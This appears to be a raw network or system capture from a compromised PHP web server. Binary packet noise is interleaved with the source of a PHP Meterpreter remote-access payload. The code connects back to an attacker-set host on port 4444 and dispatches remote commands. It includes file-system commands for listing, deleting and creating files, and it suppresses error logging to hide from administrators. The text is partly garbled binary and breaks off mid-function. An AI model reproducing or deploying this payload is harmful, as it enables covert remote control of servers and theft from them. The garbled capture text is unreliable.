ò`~QE}<< )y*= )y*=  `~Q}<< )y*= ) d ) d  )y*= `~Q}JJ ) d )y*=Eapache2/var/www`~Qjj ) dE \ e  ziHM2 Q~z4! r>apache2/var/www`~Qjj ) dE \( =  ziHM2!Q~zJ! r>apache2/var/www`~Qrr ) dE d ]  ziPM2"Q~z!rphp-cgi-wrap/etc/ld.so.cache`~Q& ) dE t M  zi`M2#Q~z! php-cgi-wrap /lib/tls/i686/cmov/libc-2.6.1.so`~Q)zz ) dE l U  ziXM2$Q~z!php-cgi-wrap/usr/bin/php-cgi-wrapper`~Qrr ) dE d( 5  ziPM2%Q~z!rphp5-cgi/etc/ld.so.cache`~Q ) dE x I  zidM2&Q~z! php5-cgi$/lib/tls/i686/cmov/libcrypt-2.6.1.so`~Qzz ) dE l I  ziXM2'Q~z!Pphp5-cgi/usr/lib/libz.so.`~Q ) dE v K  zibM2(Q~z*!AAphp5-cgi"/usr/lib/i686/cmov/libssl.so.0.9.8`~Qww ) dE i L  ziUM2)Q~zQ!php5-cgi/usr/lib/libdb-4.5.so`~Qvv ) dE h M  ziTM2*Q~z{! php5-cgi/lib/libbz2.so.1.0.4`~Q|| ) dE n G  ziZM2+Q~z!php5-cgi/usr/lib/libpcre.so.3.12.1`~Q: ) dE y <  zieM2,Q~z! php5-cgi%/lib/tls/i686/cmov/libresolv-2.6.1.so`~Q> ) dE t A  zi`M2-Q~z! php5-cgi /lib/tls/i686/cmov/libm-2.6.1.so`~Q> ) dE u L  ziaM2.Q~z! php5-cgi!/lib/tls/i686/cmov/libdl-2.6.1.so`~Q? ) dE v K  zibM2/Q~z8! php5-cgi"/lib/tls/i686/cmov/libnsl-2.6.1.so`~QJ ) dE r O  zi^M20Q~zt! php5-cgi/usr/lib/libgssapi_krb5.so.2.2`~QKyy ) dE k V  ziWM21Q~z! php5-cgi/usr/lib/libkrb5.so.3.3`~QT}} ) dE o R  zi[M22Q~z! php5-cgi/usr/lib/libk5crypto.so.3.1`~Qbxx ) dE j K  ziVM23Q~z! Jphp5-cgi/lib/libcom_err.so.2.1`~Q||| ) dE n S  ziZM24Q~z!Hphp5-cgi/usr/lib/libxml2.so.2.6.30`~Q} ) dE t M  zi`M25Q~z! php5-cgi /lib/tls/i686/cmov/libc-2.6.1.so`~Q~ ) dE y <  zieM26Q~z3!A@php5-cgi%/usr/lib/i686/cmov/libcrypto.so.0.9.8`~Q ) dE z G  zifM27Q~za! php5-cgi&/lib/tls/i686/cmov/libpthread-2.6.1.so`~Q ) dE r C  zi^M28Q~z! php5-cgi/usr/lib/libkrb5support.so.0.1`~Qyy ) dE k V  ziWM29Q~z! *php5-cgi/lib/libkeyutils-1.2.so`~Qpp ) dE b S  ziNM2:Q~z!j4php5-cgi/etc/localtime`~Qtt ) dE f O  ziRM2;Q~z!jYphp5-cgi/etc/nsswitch.conf`~QЦrr ) dE d ]  ziPM2Q~z! php5-cgi(/lib/tls/i686/cmov/libnss_files-2.6.1.so`~Qئpp ) dE b S  ziNM2?Q~zH!nrphp5-cgi/etc/protocols`~Qpp ) dE b _  ziNM2@Q~zn!nrphp5-cgi/etc/protocols`~Q|| ) dE n G  ziZM2AQ~z!php5-cgi/usr/share/file/magic.mime`~Qtt ) dE f [  ziRM2BQ~z}!pphp5-cgi/var/www/index.php`~QJJ )y*= ) dE<7@@  \D<5  W`~Qqq ) dE c ^  ziOM2CQ~z!Tphp5-cgi \ `~QJJ ) d )y*=E<@@%  \PeD<Š8f 3 W`~Q֧BB )y*= ) dE47@@  \D $val) { if (is_array($val)) { # recurse dump_array($val, "{$name}[{$key}]"); } else { my_print(sprintf(" $key ($val)")); } } } function dump_readers() { global $readers; dump_array($readers, 'Readers'); } function dump_resource_map() { global $resource_type_map; dump_array($resource_type_map, 'Resource map'); } function dump_channels($extra="") { global $channels; dump_array($channels, 'Channels '.$extra); } # Doesn't exist before php 4.3 if (!function_exists("file_get_contents")) { function file_get_contents($file) { $f = @fopen($file,"rb"); $contents = false; if ($f) { do { $contents .= fgets($f); } while (!feof($f)); } fclose($f); return $contents; } } # Renamed in php 4.3 if (!function_exists('socket_set_option')) { function socket_set_option($sock, $type, $opt, $value) { socket_setopt($sock, $type, $opt, $value); } } # # Constants # define("PACKET_TYPE_REQUEST",0); define("PACKET_TYPE_RESPONSE",1); define("PACKET_TYPE_PLAIN_REQUEST", 10); define("PACKET_TYPE_PLAIN_RESPONSE", 11); define("ERROR_SUCCESS",0); # not defined in original C implementation define("ERROR_FAILURE",1); define("CHANNEL_CLASS_BUFFERED", 0)`~Q1 ) d )y*=E @@  \PD<ŀ  3 W; define("CHANNEL_CLASS_STREAM", 1); define("CHANNEL_CLASS_DATAGRAM", 2); define("CHANNEL_CLASS_POOL", 3); # # TLV Meta Types # define("TLV_META_TYPE_NONE", ( 0 )); define("TLV_META_TYPE_STRING", (1 << 16)); define("TLV_META_TYPE_UINT", (1 << 17)); define("TLV_META_TYPE_RAW", (1 << 18)); define("TLV_META_TYPE_BOOL", (1 << 19)); define("TLV_META_TYPE_COMPRESSED", (1 << 29)); define("TLV_META_TYPE_GROUP", (1 << 30)); define("TLV_META_TYPE_COMPLEX", (1 << 31)); # not defined in original define("TLV_META_TYPE_MASK", (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)); # # TLV base starting points # define("TLV_RESERVED", 0); define("TLV_EXTENSIONS", 20000); define("TLV_USER", 40000); define("TLV_TEMP", 60000); # # TLV Specific Types # define("TLV_TYPE_ANY", TLV_META_TYPE_NONE | 0); define("TLV_TYPE_METHOD", TLV_META_TYPE_STRING | 1); define("TLV_TYPE_REQUEST_ID", TLV_META_TYPE_STRING | 2); define("TLV_TYPE_EXCEPTION", TLV_META_TYPE_GROUP | 3); define("TLV_TYPE_RESULT", TLV_META_TYPE_UINT | 4); define("TLV_TYPE_STRING", TLV_META_TYPE_STRING | 10); define("TLV_TYPE_UINT", TLV_META_TYPE_UINT | 11); define("TLV_TYPE_BOOL", TLV_META_TYPE_BOOL | 12); define("TLV_TYPE_LENGTH", TLV_META_TYPE_UINT | 25); define("TLV_TYPE_DATA", TLV_META_TYPE_RAW | 26); define("TLV_TYPE_FLAGS", TLV_META_TYPE_UINT | 27); define("TLV_TYPE_CHANNEL_ID", TLV_META_TYPE_UINT | 50); define("TLV_TYPE_CHANNEL_TYPE", TLV_META_TYPE_STRING | 51); define("TLV_TYPE_CHANNEL_DATA", TLV_META_TYPE_RAW | 52); define("TLV_TYPE_CHANNEL_DATA_GROUP", TLV_META_TYPE_GROUP | 53); define("TLV_TYPE_CHANNEL_CLASS", TLV_META_TYPE_UINT | 54); define("TLV_TYPE_SEEK_WHENCE", TLV_META_TYPE_UINT | 70); define("TLV_TYPE_SEEK_OFFSET", TLV_META_TYPE_UINT | 71); define("TLV_TYPE_SEEK_POS", TLV_META_TYPE_UINT | 72); define("TLV_TYPE_EXCEPTION_CODE", TLV_META_TYPE_UINT | 300); define("TLV_TYPE_EXCEPTION_STRING", TLV_META_TYPE_STRING | 301); define("TLV_TYPE_LIBRARY_PATH", TLV_META_TYPE_STRING | 400); define("TLV_TYPE_TARGET_PATH", TLV_META_TYPE_STRING | 401); define("TLV_TYPE_MIGRATE_PID", TLV_META_TYPE_UINT | 402); define("TLV_TYPE_MIGRATE_LEN", TLV_META_TYPE_UINT | 403); define("TLV_TYPE_CIPHER_NAME", TLV_META_TYPE_STRING | 500); define("TLV_TYPE_CIPHER_PARAMETERS", TLV_META_TYPE_GROUP | 501); function my_cmd($cmd) { return shell_exec($cmd); } function is_windows() { return (strtoupper(substr(PHP_OS,0,3)) == "WIN"); } ## # Worker functions ## function core_channel_open($req, &$pkt) { $type_tlv = packet_get_tlv($`~Q8BB )y*= ) dE47@@  \D $in, 1 => $out, 2 => $err, 'type' => get_rtype($in), 'data' => ''); # Grab the last index and use it as the new ID. $id = end(array_keys($channels)); my_print("Created new channel $in, with id $id"); return $id; } # # Channels look like this: # # Array # ( # [0] => Array # ( # [0] => Resource id #12 # [1] => Resource id #13 # [2] => Resource id #14 # [type] => 'stream' # [data] => '...' # ) # ) # function get_channel_id_from_resource($resource) { global $channels; if (empty($channels)) { return false; } foreach ($channels as $i => $chan_ary) { if (in_array($resource, $chan_ary)) { my_print("Found channel id $i"); return $i; } } return false; } function get_channel_by_id($chan_id) { global $channels; my_print("Looking up channel id $chan_id"); #dump_channels("in get_channel_by_id"); if (array_key_exists($chan_id, $channels)) { my_print("Found one"); return $channels[$chan_id]; } else { return false; } } # Write data to the channel's stdin function channel_write($chan_id, $data) { $c = get_channel_by_id($chan_id); if ($c && is_resource($c[0])) { my_print("---Writing '$data' to channel $chan_id"); return write($c[0], $data); } else { return false; } } # Read from the channel's stdout function channel_read($chan_id, $len) { $c = get_channel_by_id($chan_id); if ($c) { # First get any pending unread data from a previous read $ret = substr($c['data'], 0, $len); $c['data'] = substr($c['data'], $len); if (strlen($ret) > 0) { my_print("Had some leftovers: '$ret'"); } # Next grab stderr if we have it and it's not the same file descriptor # as stdout. if (strlen($ret) < $len and is_resource($c[2]) and $c[1] != $c[2]) { # Read as much as possible into the channel's data buffer $read = read($c[2]); $c['data'] .= $read; # Now slice out however much the client asked for. If there's any # left over, they'll get it next time. If it doesn't add up to # what they requested, oh well, they'll just have to call read # again. Looping until we get the requested number of bytes is # inconsistent with win32 meterpreter and causes the whole php # process to block waiting on input. $bytes_needed = $len - strlen($ret); $ret .= substr($c['data'], 0, $bytes_needed); $c['data'] = substr($c['data'], $bytes_needed); } # Then if there's still room, grab stdout if (strlen($ret) < $len and is_resource($c[1])) { # Same as above, but for stdout. This will overwrite a false # return value from reading stderr but the two should generally # EOF at the same time, so it should be fine. $read = read($c[1]); $c['data'] .= $read; $bytes_needed = $len - strlen($ret); $ret .= substr($c['data'], 0, $bytes_needed); $c['data'] = substr($c['data'], $bytes_needed); } # In the event of one or the other of the above read()s returning # false, make sure we have sent any pending unread data before saying # EOF by returning false. Note that if they didn't return false, it is # perfectly legitimate to return an empty string which just means # there's no data right now but we haven't hit EOF yet. if (false === $read and empty($ret)) { if (interacting($chan_id)) { handle_dead_resource_channel($c[1]); } return false; } return $ret; } else { return false; } } ## # TLV Helper Functions ## function generate_req_id() { $characters = 'abcdefghijklmnopqrstuvwxyz'; $rid = ''; for ($p = 0; $p < 32; $p++) { $rid .= $characters[rand(0, strlen($characters)-1)]; } return $rid; } function handle_dead_resource_channel($resource) { global $msgsock; if (!is_resource($resource)) { return; } $cid = get_channel_id_from_resource($resource); if ($cid === false) { my_print("Resource`~QBB )y*= ) dE47@@  \D  W3`~Q8"D"D ) d )y*=ED@@  \PJD<ŀY% 3 W has no channel: {$resource}"); # Make sure the provided resource gets closed regardless of it's status # as a channel remove_reader($resource); close($resource); } else { my_print("Handling dead resource: {$resource}, for channel: {$cid}"); # Make sure we close other handles associated with this channel as well channel_close_handles($cid); # Notify the client that this channel is dead $pkt = pack("N", PACKET_TYPE_REQUEST); packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_close')); packet_add_tlv($pkt, create_tlv(TLV_TYPE_REQUEST_ID, generate_req_id())); packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid)); # Add the length to the beginning of the packet $pkt = pack("N", strlen($pkt) + 4) . $pkt; write($msgsock, $pkt); } return; } function handle_resource_read_channel($resource, $data) { global $udp_host_map; $cid = get_channel_id_from_resource($resource); my_print("Handling data from $resource"); # Build a new Packet $pkt = pack("N", PACKET_TYPE_REQUEST); packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_write')); if (array_key_exists((int)$resource, $udp_host_map)) { list($h,$p) = $udp_host_map[(int)$resource]; packet_add_tlv($pkt, create_tlv(TLV_TYPE_PEER_HOST, $h)); packet_add_tlv($pkt, create_tlv(TLV_TYPE_PEER_PORT, $p)); } packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid)); packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_DATA, $data)); packet_add_tlv($pkt, create_tlv(TLV_TYPE_LENGTH, strlen($data))); packet_add_tlv($pkt, create_tlv(TLV_TYPE_REQUEST_ID, generate_req_id())); # Add the length to the beginning of the packet $pkt = pack("N", strlen($pkt) + 4) . $pkt; return $pkt; } function create_response($req) { $pkt = pack("N", PACKET_TYPE_RESPONSE); $method_tlv = packet_get_tlv($req, TLV_TYPE_METHOD); my_print("method is {$method_tlv['value']}"); packet_add_tlv($pkt, $method_tlv); $reqid_tlv = packet_get_tlv($req, TLV_TYPE_REQUEST_ID); packet_add_tlv($pkt, $reqid_tlv); if (is_callable($method_tlv['value'])) { $result = $method_tlv['value']($req, $pkt); } else { my_print("Got a request for something I don't know how to handle (". $method_tlv['value'] ."), returning failure"); $result = ERROR_FAILURE; } packet_add_tlv($pkt, create_tlv(TLV_TYPE_RESULT, $result)); # Add the length to the beginning of the packet $pkt = pack("N", strlen($pkt) + 4) . $pkt; return $pkt; } function create_tlv($type, $val) { return array( 'type' => $type, 'value' => $val ); } function tlv_pack($tlv) { $ret = ""; #my_print("Creating a tlv of type: {$tlv['type']}"); if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) { $ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0"); } elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) { $ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']); } elseif (($tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) { # PHP's pack appears to be busted for chars, $ret = pack("NN", 8 + 1, $tlv['type']); $ret .= $tlv['value'] ? "\x01" : "\x00"; } elseif (($tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) { $ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value']; } elseif (($tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP) { # treat groups the same as raw $ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value']; } elseif (($tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX) { # treat complex the same as raw $ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value']; } else { my_print("Don't know how to make a tlv of type ". $tlv['type'] . " (meta type ". sprintf("%08x", $tlv['type'] & TLV_META_TYPE_MASK) ."), wtf"); } return $ret; } function packet_add_tlv(&$pkt, $tlv) { $pkt .= tlv_pack($tlv); } function packet_get_tlv($pkt, $type) { #my_print("Looking for a tlv of type $type"); # Start at offset 8 to skip past the packet header $offset = 8; while ($offset < strlen($pkt)) { $tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8)); #my_print("len: {$tlv['len']}, type: {$tlv['type']}"); if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) { #my_print("Found one at offset $offset"); if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) { $tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len'])); } elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) { $tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len'])); } elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) { $tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len'])); } elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) { $tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8)); $tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8); } else { my_print("Wtf type is this? $type"); $tlv = null; } return $tlv; } $offset += $tlv['len']; } #my_print("Didn't find one, wtf"); return false; } ## # Functions for genericizing the stream/socket conundrum ## function register_socket($sock, $ipaddr=null, $port=null) { global $resource_type_map, $udp_host_map; my_print("Registering socket $sock for ($ipaddr:$port)"); $resource_type_map[(int)$sock] = 'socket'; if ($ipaddr) { $udp_host_map[(int)$sock] = array($ipaddr, $port); #dump_array($udp_host_map, "UDP Map after registering a new socket"); } } # The stream functions cannot be unconnected, so don't require a host map function register_stream($stream, $ipaddr=null, $port=null) { global $resource_type_map, $udp_host_map; my_print("Registering stream $stream for ($ipaddr:$port)"); $resource_type_map[(int)$stream] = 'stream'; if ($ipaddr) { $udp_host_map[(int)$stream] = array($ipaddr, $port); #dump_array($udp_host_map, "UDP Map after registering a new stream"); } } function connect($ipaddr, $port, $proto='tcp') { my_print("Doing connect($ipaddr, $port)"); $sock = false; # IPv6 requires brackets around the address in some cases, but not all. # Keep track of the un-bracketed address for the functions that don't like # brackets, specifically socket_connect and socket_sendto. $ipf = AF_INET; $raw_ip = $ipaddr; if (FALSE !== strpos($ipaddr, ":")) { $ipf = AF_INET6; $ipaddr = "[". $raw_ip ."]"; } # Prefer the stream versions so we don't have to use both select functions # unnecessarily, but fall back to socket_create if they aren't available. if (is_callable('stream_socket_client')) { my_print("stream_socket_client({$proto}://{$ipaddr}:{$port})"); $sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}"); my_print("Got a sock: $sock"); if (!$sock) { return false; } if ($proto == 'tcp') { register_stream($sock); } elseif ($proto == 'udp') { register_stream($sock, $ipaddr, $port); } else { my_print("WTF proto is this: '$proto'"); } } else if (is_callable('fsockopen')) { my_print("fsockopen"); if ($proto == 'tcp') { $sock = fsockopen($ipaddr,$port); if (!$sock) { return false; } if (is_callable('socket_set_timeout')) { socket_set_timeout($sock, 2); } register_stream($sock); } else { $sock = fsockopen($proto."://".$ipaddr,$port); if (!$sock) { return false; } register_stream($sock, $ipaddr, $port); } } else if (is_callable('socket_create')) { my_print("socket_create"); if ($proto == 'tcp') { $sock = socket_create($ipf, SOCK_STREAM, SOL_TCP); $res = socket_connect($sock, $raw_ip, $port); if (!$res) { return false; } register_socket($sock); } elseif ($proto == 'udp') { $sock = socket_create($ipf, SOCK_DGRAM, SOL_UDP); register_socket($sock, $raw_ip, $port); } } return $sock; } function eof($resource) { $ret = false; switch (get_rtype($resource)) { # XXX Doesn't work with sockets. case 'socket': break; case 'stream': # We set the socket timeout for streams opened with fsockopen() when # they are created. I hope this is enough to deal with hangs when # calling feof() on socket streams, but who knows. This is PHP, # anything could happen. Some day they'll probably add a new function # called stream_eof() and it will handle sockets properly except for # some edge case that happens for every socket except the one or two # they tested it on and it will always return false on windows and # later they'll rename it to real_stream_eof_this_language_isretarded(). # # See http://us2.php.net/manual/en/function.feof.php , specifically this: # If a connection opened by fsockopen() wasn't closed by the server, # feof() will hang. To workaround this, see below example: # 0) { $buff .= fread($resource, $md['unread_bytes']); break; } else { #$len = 1; $tmp = fread($resource, $len); $buff .= $tmp; if (strlen($tmp) < $len) { break; } } if ($resource != $msgsock) { my_print("buff: '$buff'"); } $r = Array($resource); } my_print(sprintf("Done with the big read loop on $resource, got %d bytes", strlen($buff))); break; default: # then this is possibly a closed channel resource, see if we have any # data from previous reads $cid = get_channel_id_from_resource($resource); $c = get_channel_by_id($cid); if ($c and $c['data']) { $buff = substr($c['data'], 0, $len); $c['data'] = substr($c['data'], $len); my_print("Aha! got some leftovers"); } else { my_print("Wtf don't know how to read from resource $resource, c: $c"); if (is_array($c)) { dump_array($c); } break; } } my_print(sprintf("Read %d bytes", strlen($buff))); return $buff; } function write($resource, $buff, $len=0) { global $udp_host_map; if ($len == 0) { $len = strlen($buff); } #my_print(sprintf("Writing $len bytes to $resource which is a %s", get_rtype($resource))); $count = false; switch (get_rtype($resource)) { case 'socket': if (array_key_exists((int)$resource, $udp_host_map)) { my_print("Writing UDP socket"); list($host,$port) = $udp_host_map[(int)$resource]; $count = socket_sendto($resource, $buff, $len, $host, $port); } else { $count = socket_write($resource, $buff, $len); } break; case 'stream': $count = fwrite($resource, $buff, $len); fflush($resource); break; default: my_print("Wtf don't know how to write to resource $resource"); break; } return $count; } function get_rtype($resource) { global $resource_type_map; if (array_key_exists((int)$resource, $resource_type_map)) { return $resource_type_map[(int)$resource]; } return false; } function select(&$r, &$w, &$e, $tv_sec=0, $tv_usec=0) { $streams_r = array(); $streams_w = array(); $streams_e = array(); $sockets_r = array(); $sockets_w = array(); $sockets_e = array(); if ($r) { foreach ($r as $resource) { switch (get_rtype($resource)) { case 'socket': $sockets_r[] = $resource; break; case 'stream': $streams_r[] = $resource; break; default: my_print("Unknown resource type"); break; } } } if ($w) { foreach ($w as $resource) { switch (get_rtype($resource)) { case 'socket': $sockets_w[] = $resource; break; case 'stream': $streams_w[] = $resource; break; default: my_print("Unknown resource type"); break; } } } if ($e) { foreach ($e as $resource) { switch (get_rtype($resource)) { case 'socket': $sockets_e[] = $resource; break; case 'stream': $streams_e[] = $resource; break; default: my_print("Unknown resource type"); break; } } } $n_sockets = count($sockets_r) + count($sockets_w) + count($sockets_e); $n_streams = count($streams_r) + count($streams_w) + count($streams_e); #my_print("Selecting $n_sockets sockets and $n_streams streams with timeout $tv_sec.$tv_usec"); $r = array(); $w = array(); $e = array(); # Workaround for some versions of PHP that throw an error and bail out if # select is given an empty array if (count($sockets_r)==0) { $sockets_r = null; } if (count($sockets_w)==0) { $sockets_w = null; } if (count($sockets_e)==0) { $sockets_e = null; } if (count($streams_r)==0) { $streams_r = null; } if (count($streams_w)==0) { $streams_w = null; } if (count($streams_e)==0) { $streams_e = null; } $count = 0; if ($n_sockets > 0) { $res = socket_select($sockets_r, $sockets_w, $sockets_e, $tv_sec, $tv_usec); if (false === $res) { return false; } if (is_a`~Q}BB )y*= ) dE47@@  \D 0) { $res = stream_select($streams_r, $streams_w, $streams_e, $tv_sec, $tv_usec); if (false === $res) { return false; } if (is_array($r) && is_array($streams_r)) { $r = array_merge($r, $streams_r); } if (is_array($w) && is_array($streams_w)) { $w = array_merge($w, $streams_w); } if (is_array($e) && is_array($streams_e)) { $e = array_merge($e, $streams_e); } $count += $res; } #my_print(sprintf("total: $count, Modified counts: r=%s w=%s e=%s", count($r), count($w), count($e))); return $count; } function add_reader($resource) { global $readers; if (is_resource($resource) && !in_array($resource, $readers)) { $readers[] = $resource; } } function remove_reader($resource) { global $readers; #my_print("Removing reader: $resource"); #dump_readers(); if (in_array($resource, $readers)) { foreach ($readers as $key => $r) { if ($r == $resource) { unset($readers[$key]); } } } } ## # Main stuff ## ob_implicit_flush(); # For debugging #error_reporting(E_ALL); # Turn off error reporting so we don't leave any ugly logs. Why make an # administrator's job easier if we don't have to? =) error_reporting(0); @ignore_user_abort(true); # Has no effect in safe mode, but try anyway @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0); # If we don't have a socket we're standalone, setup the connection here. # Otherwise, this is a staged payload, don't bother connecting if (!isset($GLOBALS['msgsock'])) { # The payload handler overwrites this with the correct LHOST before sending # it to the victim. $ipaddr = ''; $port = 4444; my_print("Don't have a msgsock, trying to connect($ipaddr, $port)"); $msgsock = connect($ipaddr, $port); if (!$msgsock) { die(); } } else { # The ABI for PHP stagers is a socket in $msgsock and it's type (socket or # stream) in $msgsock_type $msgsock = $GLOBALS['msgsock']; $msgsock_type = $GLOBALS['msgsock_type']; switch ($msgsock_type) { case 'socket': register_socket($msgsock); break; case 'stream': # fall through default: register_stream($msgsock); } } add_reader($msgsock); # # Main dispatch loop # $r=$GLOBALS['readers']; while (false !== ($cnt = select($r, $w=null, $e=null, 1))) { #my_print(sprintf("Returned from select with %s readers", count($r))); $read_failed = false; for ($i = 0; $i < $cnt; $i++) { $ready = $r[$i]; if ($ready == $msgsock) { $request = read($msgsock, 8); #my_print(sprintf("Read returned %s bytes", strlen($request))); if (false==$request) { #my_print("Read failed on main socket, bailing"); # We failed on the main socket. There's no way to continue, so # break all the way out. break 2; } $a = unpack("Nlen/Ntype", $request); # length of the whole packet, including header $len = $a['len']; # packet type should always be 0, i.e. PACKET_TYPE_REQUEST $ptype = $a['type']; while (strlen($request) < $a['len']) { $request .= read($msgsock, $len-strlen($request)); } #my_print("creating response"); $response = create_response($request); write($msgsock, $response); } else { #my_print("not Msgsock: $ready"); $data = read($ready); if (false === $data) { handle_dead_resource_channel($ready); } elseif (strlen($data) > 0){ my_print(sprintf("Read returned %s bytes", strlen($data))); $request = handle_resource_read_channel($ready, $data); if ($request) { write($msgsock, $request); } } } } # $r is modified by select, so reset it $r = $GLOBALS['readers']; } # end main loop my_print("Finished"); my_print("--------------------"); close($msgsock); `~QaBB )y*= ) dE47@@  \D  W3`~QBB )y*= ) dE47@@  \D= 4.0.0. * @author soywiz at php dot net * @since 17-Jul-2006 10:12 */ if (!function_exists('fnmatch')) { function fnmatch($pattern, $string) { return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string); } } /** * Prepends $string to each element of $array * If $deep is true, will indeed also apply to sub-arrays * @author BigueNique AT yahoo DOT ca * @since 080324 */ if (!function_exists('array_prepend')) { function array_prepend($array, $string, $deep=false) { if(empty($array)||empty($string)) return $array; foreach($array as $key => $element) if(is_array($element)) if($deep) $array[$key] = array_prepend($element,$string,$deep); else trigger_error('array_prepend: array element',E_USER_WARNING); else $array[$key] = $string.$element; return $array; } } ## END Search Helpers if (!function_exists('cononicalize_path')) { function cononicalize_path($path) { $path = str_replace(array("/", "\\"), DIRECTORY_SEPARATOR, $path); return $path; } } # # Need to nail down what this should actually do. Ruby's File.expand_path is # for cononicalizing a path (e.g., removing /./ and ../) and expanding "~" into # a path to the current user's homedir. In contrast, Meterpreter has # traditionally used this to get environment variables from the server. # if (!function_exists('stdapi_fs_file_expand_path')) { register_command('stdapi_fs_file_expand_path'); function stdapi_fs_file_expand_path($req, &$pkt) { my_print("doing expand_path"); $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH); $env = $path_tlv['value']; my_print("Request for: '$env'"); if (!is_windows()) { # Handle some basic windows-isms when we can switch ($env) { case "%COMSPEC%": $path = "/bin/sh"; break; case "%TEMP%": case "%TMP%": $path = "/tmp"; break; default: # Don't know what the user meant, just try it as an environment # variable and hope for the best. $path = getenv($env); } } else { $path = getenv($env); if (empty($path) and ($env == "%COMSPEC%")) { # hope it's in the path $path = "cmd.exe"; } } my_print("Returning with an answer of: '$path'"); if ($path) { packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_PATH, $path)); return ERROR_SUCCESS; } return ERROR_FAILURE; } } if (!function_exists('stdapi_fs_delete_dir')) { register_command('stdapi_fs_delete_dir'); function stdapi_fs_delete_dir($req, &$pkt) { my_print("doing rmdir"); $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH); $ret = @rmdir(cononicalize_path($path_tlv['value'])); return $ret ? ERROR_SUCCESS : ERROR_FAILURE; } } if (!function_exists('stdapi_fs_mkdir')) { register_command('stdapi_fs_mkdir'); function stdapi_fs_mkdir($req, &$pkt) { my_print("doing mkdir"); $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH); $ret = @mkdir(cononicalize_path($path_tlv['value'])); return $ret ? ERROR_SUCCESS : ERROR_FAILURE; } } # works if (!function_exists('stdapi_fs_chdir')) { register_command('stdapi_fs_chdir'); function stdapi_fs_chdir($req, &$pkt) { my_print("doing chdir"); $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH); $ret = @chdir(cononicalize_path($path_tlv['value'])); return $ret ? ERROR_SUCCESS : ERROR_FAILURE; } } # works if (!function_exists('stdapi_fs_delete')) { register_command('stdapi_fs_delete'); function stdapi_fs_delete($req, &$pkt) { my_print("doing delete"); $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME); $ret = @unlink(cononicalize_path($path_tlv['value'])); return $ret ? ERROR_SUCCESS : ERROR_FAILURE; } } # works if (!function_exists('stdapi_fs_getwd')) { register_command('stdapi_fs_getwd'); function stdapi_fs_getwd($req, &$pkt) { my_print("doing pwd"); packet_add_tlv($pkt, create_tlv(TLV_TYPE_DIRECTORY_PATH, getcwd())); return ERROR_SUCCESS; } } # works partially, need to get the path argument to mean the same thing as in # windows if (!function_exists('stdapi_fs_ls')) { register_command('stdapi_fs_ls'); function stdapi_fs_ls($req, &$pkt) { my_print("doing ls"); $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH); $path = cononicalize_path($path_tlv['value']); $dir_handle = @opendir($path); if ($dir_handle) { while ($file = readdir($dir_handle)) { if ($file != "." && $file != "..") { #my_print("Adding file $file"); packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $file)); packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_PATH, $path . DIRECTORY_SEPARATOR . $file)); $st = stat($path . DIRECTORY_SEPARATOR . $file); $st_buf = ""; $st_buf .= pack("V", $st['dev']); $st_buf .= pack("v", $st['ino']); $st_buf .= pack("v", $st['mode']); $st_buf .= pack("v", $st['nlink']); $st_buf .= pack("v", $st['uid']); $st_buf .= pack("v", $st['gid']); $st_buf .= pack("v", 0); $st_buf .= pack("V", $st['rdev']); $st_buf .= pack("V", $st['size']); $st_buf .= pack("V", $st['atime']); $st_buf .= pack("V", $st['mtime']); $st_buf .= pack("V", $st['ctime']); $st_buf .= pack("V", $st['blksize']); $st_buf .= pack("V", $st['blocks']); packet_add_tlv($pkt, create_tlv(TLV_TYPE_STAT_BUF, $st_buf)); } } closedir($dir_handle); return ERROR_SUCCESS; } else { return ERROR_FAILURE; } } } if (!function_exists('stdapi_fs_separator')) { register_command('stdapi_fs_separator'); function stdapi_fs_separator($req, &$pkt) { packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, DIRECTORY_SEPARATOR)); return ERROR_SUCCESS; } } if (!function_exists('stdapi_fs_stat')) { 